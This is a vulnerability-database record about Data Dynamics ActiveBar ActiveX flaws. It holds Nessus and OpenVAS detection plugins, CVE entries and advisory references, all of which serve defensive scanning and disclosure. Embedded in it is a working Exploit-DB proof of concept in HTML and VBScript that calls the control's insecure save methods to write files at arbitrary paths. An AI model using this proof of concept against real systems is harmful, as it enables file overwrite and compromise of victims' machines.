{"id": "DATA_DYNAMICS_ACTIVEBAR_ACTIVEX.NASL", "bulletinFamily": "scanner", "title": "Data Dynamics ActiveBar ActiveX Controls Code Execution", "description": "One or more of the Data Dynamics ActiveBar ActiveX controls installed\non the remote Windows host is affected by a code execution\nvulnerability due to unspecified issues in the 'Save()',\n'SaveLayoutChanges()', 'SaveMenuUsageData()', and 'SetLayoutData()'\nmethods.\n\nNote that Data Dynamics ActiveBar is bundled with IBM Rational System\nArchitect.", "published": "2011-05-27T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/54841", "reporter": "This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?b6df7b53", "http://www.nessus.org/u?7b9146d0", "http://www.nessus.org/u?7d0d8d3c", "http://www.nessus.org/u?beeeb215"], "cvelist": ["CVE-2011-1207", "CVE-2007-3883"], "type": "nessus", "lastseen": "2021-02-01T01:38:29", "edition": 30, "viewCount": 888, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-3883", "CVE-2011-1207"]}, {"type": "exploitdb", "idList": ["EDB-ID:4190"]}, {"type": "osvdb", "idList": ["OSVDB:37692"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801966"]}, {"type": "nessus", "idList": ["SMB_KB_2562937.NASL"]}], "modified": "2021-02-01T01:38:29", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-02-01T01:38:29", "rev": 2}, "vulnersScore": 7.6}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54841);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/19 16:04:01\");\n\n script_cve_id(\"CVE-2007-3883\", \"CVE-2011-1207\");\n script_bugtraq_id(24959, 47643);\n script_xref(name:\"Secunia\", value:\"26098\");\n script_xref(name:\"Secunia\", value:\"43399\");\n script_xref(name:\"Secunia\", value:\"43474\");\n script_xref(name:\"EDB-ID\", value:\"4190\");\n script_xref(name:\"EDB-ID\", value:\"5395\");\n\n script_name(english:\"Data Dynamics ActiveBar ActiveX Controls Code Execution\");\n script_summary(english:\"Checks for ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control installed that is\naffected by a code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"One or more of the Data Dynamics ActiveBar ActiveX controls installed\non the remote Windows host is affected by a code execution\nvulnerability due to unspecified issues in the 'Save()',\n'SaveLayoutChanges()', 'SaveMenuUsageData()', and 'SetLayoutData()'\nmethods.\n\nNote that Data Dynamics ActiveBar is bundled with IBM Rational System\nArchitect.\");\n# https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2011/2562937\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d0d8d3c\");\n# https://www.ibm.com/support/knowledgecenter/SS6RBX_11.4.3/eos\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6df7b53\");\n# https://www-01.ibm.com/software/support/lifecycleapp/PLCDetail.wss?psynkey=N966355F88743I06&synkey=A463845J20176P72&from=spf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?beeeb215\");\n# http://auscert.org.au/bulletins/ASB-2011.0035/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7b9146d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Multiple solutions exist to resolve this vulnerability :\n\n - Upgrade to IBM Rational System Architect 11.3.1.4 (eGA\n 29 April 2011) / 11.4.0.3 (eGA 29 April 2011) or later.\n\n - Install Microsoft KB2562937 (Update Rollup for ActiveX\n Kill Bits).\n\n - Disable the use of the vulnerable ActiveX controls\n within Internet Explorer per the IBM advisory.\n\n - Disable all ActiveX controls in the Internet Zone.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-1207\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/27\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:datadynamics:activebar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:rational_system_architect\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nif (activex_init() != ACK_OK) exit(1, 'activex_init() failed.');\n\ninfo = \"\";\ncontrolinstalled=FALSE;\nclsids = make_list(\n '{E4F874A0-56ED-11D0-9C43-00A0C90F29FC}',\n '{4932CEF4-2CAA-11D2-A165-0060081C43D9}',\n '{5407153D-022F-4CD2-8BFF-465569BC5DB8}'\n);\n\nforeach clsid (clsids)\n{\n file = activex_get_filename(clsid:clsid);\n if (isnull(file))\n {\n debug_print('activex_get_filename() returned NULL.');\n continue;\n }\n if (!file)\n {\n debug_print('The control is not installed as the class id \\''+clsid+'\\' does not exist on the remote host.');\n continue;\n }\n controlinstalled=TRUE;\n\n # Get its version.\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n # And check it.\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += \n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version + '\\n';\n }\n}\nactivex_end();\nif (!controlinstalled) exit(0, 'None of the affected controls were found on the remote host.');\n\n# Report findings.\nif (info)\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n '\\nNote, though, that Nessus did not check whether the kill bit was set' +\n '\\nfor the control\\'s CLSID because of the Report Paranoia setting in' +\n '\\neffect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n '\\nMoreover, its kill bit is not set so it is accessible via Internet' +\n '\\nExplorer.\\n';\n }\n\n security_report_v4(port:kb_smb_transport(), severity:SECURITY_HOLE, extra:report);\n}\nelse exit(0, 'One or more of the controls are installed but their kill bits are set.');\n", "naslFamily": "Windows", "pluginID": "54841", "cpe": ["cpe:/a:ibm:rational_system_architect", "cpe:/a:datadynamics:activebar"], "scheme": null, "cvss3": {"score": 9.6, "vector": "AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}}

{"cve": [{"lastseen": "2021-02-02T05:31:25", "description": "The Data Dynamics ActiveBar ActiveX control (actbar3.ocx) 3.2 and earlier allows remote attackers to create or overwrite files via a full pathname in (1) the second argument to the Save method, or the first argument to the (2) SaveLayoutChanges or (3) SaveMenuUsageData method.", "edition": 6, "cvss3": {}, "published": "2007-07-18T23:30:00", "title": "CVE-2007-3883", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3883"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:datadynamics:activebar:3.1"], "id": "CVE-2007-3883", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3883", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:datadynamics:activebar:3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:00", "description": "The ActiveBar1 ActiveX control in the Data Dynamics ActiveBar ActiveX controls, as distributed in ActBar.ocx 1.0.6.5 in IBM Rational System Architect 11.4.0.2, 11.4.0.1, and earlier, does not properly restrict the SetLayoutData method, which allows remote attackers to execute arbitrary code via a crafted Data argument, a different vulnerability than CVE-2007-3883. NOTE: some of these details are obtained from third party information.", "edition": 6, "cvss3": {}, "published": "2011-05-05T02:39:00", "title": "CVE-2011-1207", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1207"], "modified": "2011-05-31T04:00:00", "cpe": ["cpe:/a:ibm:rational_system_architect:11.3", "cpe:/a:ibm:rational_system_architect:11.4.0.2", "cpe:/a:ibm:rational_system_architect:11.3.1", "cpe:/a:ibm:rational_system_architect:11.4.0.1", "cpe:/a:ibm:rational_system_architect:11.3.1.2", "cpe:/a:ibm:rational_system_architect:11.3.1.3", "cpe:/a:ibm:rational_system_architect:11.3.1.1", "cpe:/a:ibm:rational_system_architect:11.4"], "id": "CVE-2011-1207", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1207", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ibm:rational_system_architect:11.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_system_architect:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_system_architect:11.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_system_architect:11.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_system_architect:11.4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_system_architect:11.3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_system_architect:11.4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_system_architect:11.3:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T20:21:08", "description": "Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) Insecure Methods. CVE-2007-3883. Remote exploit for windows platform", "published": "2007-07-17T00:00:00", "type": "exploitdb", "title": "Data Dynamics ActiveBar ActiveX actbar3.ocx <= 3.1 Insecure Methods", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3883"], "modified": "2007-07-17T00:00:00", "id": "EDB-ID:4190", "href": "https://www.exploit-db.com/exploits/4190/", "sourceData": "<pre>\n<code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\">---------------------------------------------------------------------------------------\n <b>Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods</b>\n url: http://www.datadynamics.com/default.aspx\n\n author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://shinnai.altervista.org\n \n This was written for educational purpose. Use it at your own risk.\n Author will be not be responsible for any damage.\n \n <b><font color=\"#FF0000\">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF\n IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>\n\n Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7\n all software that use this ocx are vulnerable to this exploits.\n\n <b>This control is marked as:\n RegKey Safe for Script: True\n RegKey Safe for Init: True\n Implements IObjectSafety: False\n KillBitSet: False</b>\n---------------------------------------------------------------------------------------\n\n<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>\n\n<select style=\"width: 404px\" name=\"Pucca\">\n <option value = \"Save\">Save</option>\n <option value = \"SaveLayoutChanges\">SaveLayoutChanges</option>\n <option value = \"SaveMenuUsageData\">SaveMenuUsageData</option>\n</select>\n\n<input language=VBScript onclick=tryMe() type=button value=\"Click here to start the test\">\n\n<script language='vbscript'>\n Sub tryMe\n on error resume next\n Dim MyMsg\n if Pucca.value = \"Save\" then\n test.Save \"\", \"c:\\carlo1.txt\", 1\n MyMsg = MsgBox(\"Ok, now check your system.ini file\")\n elseif Pucca.value = \"SaveLayoutChanges\" then\n test.SaveLayoutChanges \"c:\\carlo2.txt\", 1\n MyMsg = MsgBox(\"Ok, now check your system.ini file\")\n elseif Pucca.value = \"SaveMenuUsageData\" then\n test.SaveMenuUsageData \"c:\\carlo3.txt\", 1\n MyMsg = MsgBox(\"Ok, now check your system.ini file\")\n end if\n\n End Sub\n</script>\n\n</span></span>\n</code></pre>\n\n# milw0rm.com [2007-07-17]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4190/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-3883"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:26098](https://secuniaresearch.flexerasoftware.com/advisories/26098/)\nISS X-Force ID: 35471\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4190\n[CVE-2007-3883](https://vulners.com/cve/CVE-2007-3883)\nBugtraq ID: 24959\n", "edition": 1, "modified": "2007-07-17T00:00:00", "published": "2007-07-17T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37692", "id": "OSVDB:37692", "title": "Data Dynamics ActiveBar ActiveX (actbar3.ocx) Multiple Method Arbitrary File Manipulation", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-01-08T14:04:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1207", "CVE-2011-0331", "CVE-2011-1827"], "description": "This script will list all the vulnerable activex controls installed\n on the remote windows machine with references and cause.", "modified": "2019-12-20T00:00:00", "published": "2011-08-11T00:00:00", "id": "OPENVAS:1361412562310801966", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801966", "type": "openvas", "title": "Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801966\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-08-11 06:41:03 +0200 (Thu, 11 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937)\");\n script_cve_id(\"CVE-2011-0331\", \"CVE-2011-1207\", \"CVE-2011-1827\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2562937\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2011/2562937\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote attackers execute arbitrary code,\n and can compromise a vulnerable system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 Service Pack 1 and prior\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2003 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 2 and prior\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to error in restricting the SetLayoutData method,\n which fails to properly restrict the SetLayoutData method.\");\n\n script_tag(name:\"summary\", value:\"This script will list all the vulnerable activex controls installed\n on the remote windows machine with references and cause.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch Workaround:\n Set the killbit for the following CLSIDs,\n\n {B4CB50E4-0309-4906-86EA-10B6641C8392},\n\n {E4F874A0-56ED-11D0-9C43-00A0C90F29FC},\n\n {FB7FE605-A832-11D1-88A8-0000E8D220A6}\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2562937\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"secpod_activex.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(hotfix_missing(name:\"2562937\") == 0){\n exit(0);\n}\n\nclsids = make_list(\"{B4CB50E4-0309-4906-86EA-10B6641C8392}\",\n \"{E4F874A0-56ED-11D0-9C43-00A0C90F29FC}\",\n \"{FB7FE605-A832-11D1-88A8-0000E8D220A6}\");\n\nforeach clsid (clsids)\n{\n if(is_killbit_set(clsid:clsid) == 0)\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-01T06:14:42", "description": "The remote Windows host is missing a list of kill bits for ActiveX\ncontrols that are known to contain vulnerabilities. \n\nIf these ActiveX controls are ever installed on the remote host,\neither now or in the future, they would expose it to various security\nissues.\n\nNote that the affected controls are from third-party vendors that have\nasked Microsoft to prevent their controls from being run in Internet\nExplorer.", "edition": 26, "published": "2011-08-10T00:00:00", "title": "MS 2562937: Update Rollup for ActiveX Kill Bits (2562937)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1207", "CVE-2011-0331", "CVE-2011-1827"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB_2562937.NASL", "href": "https://www.tenable.com/plugins/nessus/55802", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(55802);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2011-0331\", \"CVE-2011-1207\", \"CVE-2011-1827\");\n script_bugtraq_id(46930, 47643, 47695);\n script_xref(name:\"ICS-ALERT\", value:\"11-103-01A\");\n script_xref(name:\"MSKB\", value:\"2562937\");\n\n script_name(english:\"MS 2562937: Update Rollup for ActiveX Kill Bits (2562937)\");\n script_summary(english:\"Checks if kill bits have been set\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host is missing an update that disables selected\nActiveX controls.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value: \n\"The remote Windows host is missing a list of kill bits for ActiveX\ncontrols that are known to contain vulnerabilities. \n\nIf these ActiveX controls are ever installed on the remote host,\neither now or in the future, they would expose it to various security\nissues.\n\nNote that the affected controls are from third-party vendors that have\nasked Microsoft to prevent their controls from being run in Internet\nExplorer.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2562937/microsoft-security-advisory-update-rollup-for-activex-kill-bits\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:ND/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp(xp:4, win2003:3, vista:3, win7:2) <= 0)\n exit(0, \"The host is not affected based on its version / service pack.\");\nif (hotfix_check_server_core() == 1) exit(0, \"Windows Server Core installs are not affected.\");\nif (activex_init() != ACX_OK) exit(1, \"Unable to initialize the ActiveX API.\");\n\n\n# Test each control.\ninfo = \"\";\nclsids = make_list(\n '{B4CB50E4-0309-4906-86EA-10B6641C8392}', # CheckPoint SSL VPN On-Demand\n '{E4F874A0-56ED-11D0-9C43-00A0C90F29FC}', # ActBar\n '{FB7FE605-A832-11D1-88A8-0000E8D220A6}' # EBI R Web Toolkit\n);\n\nforeach clsid (clsids)\n{\n if (activex_get_killbit(clsid:clsid) == 0)\n {\n info += ' ' + clsid + '\\n';\n if (!thorough_tests) break;\n }\n}\nactivex_end();\n\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 1) s = \"s\";\n else s = \"\";\n\n report =\n '\\nThe kill bit has not been set for the following control'+s+' :\\n\\n'+\n info;\n\n if (!thorough_tests)\n {\n report +=\n '\\nNote that Nessus did not check whether there were other kill bits\\n'+\n 'that have not been set because the \"Perform thorough tests\" setting\\n'+\n 'was not enabled when this scan was run.\\n';\n }\n hotfix_add_report(report);\n }\n else hotfix_add_report();\n\n hotfix_security_warning();\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}]}